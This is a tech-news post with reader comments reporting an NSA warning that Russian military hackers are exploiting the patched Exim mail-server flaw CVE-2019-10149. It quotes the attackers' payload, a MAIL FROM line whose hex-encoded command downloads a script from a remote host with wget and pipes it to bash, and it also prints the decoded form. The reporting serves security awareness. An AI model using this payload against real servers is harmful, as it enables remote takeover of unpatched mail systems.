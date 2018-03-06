from the patch-your-servers-now! dept.
It's not every day the NSA publicly warns of attacks by Kremlin hackers – so take this critical Exim flaw seriously:
The NSA has raised the alarm over what it says is Russia's active exploitation of a remote-code execution flaw in Exim for which a patch exists.
The American surveillance super-agency said [PDF] on Thursday the Kremlin's military intelligence hackers are actively targeting some systems vulnerable to CVE-2019-10149, a security hole in the widely used Exim mail transfer agent (MTA) that was fixed last June.
Here's a sample of Moscow's exploit code, according to the NSA, which is sent to a vulnerable server to hijack it – we've censored parts of it to avoid tripping any filters:
MAIL FROM:${run{\x2Fbin\x2Fsh\t- c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20hxxp\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be That hexadecimal decodes to: /bin/sh -c "exec /usr/bin/wget -O - hxxp://hostapp.be/script1.sh | bash"
"The Russian actors, part of the General Staff Main Intelligence Directorate's (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker's dream access – as long as that network is using an unpatched version of Exim MTA," the NSA said.
In this case, miscreants, linked to the military-backed Sandworm operation, exploit improper validation of the recipient's address in Exim's deliver_message() function in /src/deliver.c to inject and execute a shell command, which downloads and runs another script to commandeer the server. An in-depth technical description of the programming blunder can be found here by Qualys, which found and reported the flaw last year.
Because Exim is widely used on millions of Linux and Unix servers for mail, bugs in the MTA are by nature public-facing and pose an attractive target for hackers of all nations.
The NSA did not say who exactly was being targeted, though we can imagine the Russian military takes an interest in probing foreign government agencies and vital industries. GRU hackers have also previously targeted energy utilities, by some reports.
Previously: 400,000 Servers Using Exim May be at Risk of Serious Code-Execution Attacks
A bug in an obscure but widely used email program may be putting as many as 400,000 servers around the world at risk of serious attack until they install an update.
The flaw—which is in all releases of the Exim message transfer agent except for version 4.90.1—opens servers to attacks that can execute malicious code, researchers who discovered the vulnerability warned in an advisory published Tuesday. The buffer overflow vulnerability, which is indexed as CVE-2018-6789, resides in base64 decode function. By sending specially manipulated input to a server running Exim, attackers may be able to remotely execute code.
(Score: 2) by Mojibake Tengu on Saturday May 30, @03:41PM (1 child)
So, the maybe-Russians are working with a maybe-NSA backdoor introduced in April 6, 2016, which was already fixed about a year ago, right?
What we really need to know is the name of the guy who created the backdoor.
Because, now we need to check everything this guy did.
Yeriḥo. Karthāgō. Sogdiana. Besièrs. 広島市 (Hiroshima-shi). For Love of God, what next?
(Score: 0) by Anonymous Coward on Saturday May 30, @04:19PM
https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt [qualys.com] :
What more need be said?! *FACEPALM*
(Score: 1) by RandomFactor on Saturday May 30, @03:45PM
Although hardly universal, many of the 'at risk' systems will be behind perfectly capable email security layers (Proofpoint, Barracuda, Mimecast, EOP, GSuite etc.) which would have blocked this within hours or days of the original disclosure.
This is going to primarily apply to individuals and smaller organizations without strong IT security policies and guidelines for application development and deployment pertaining to email.
Just building something huge and sticking guns on it. It's....Super American. ---Kogoro Kurata
(Score: 0) by Anonymous Coward on Saturday May 30, @03:54PM
Anyone who haven't updated since that bug was published is already hacked by someone else. That warning seems useless.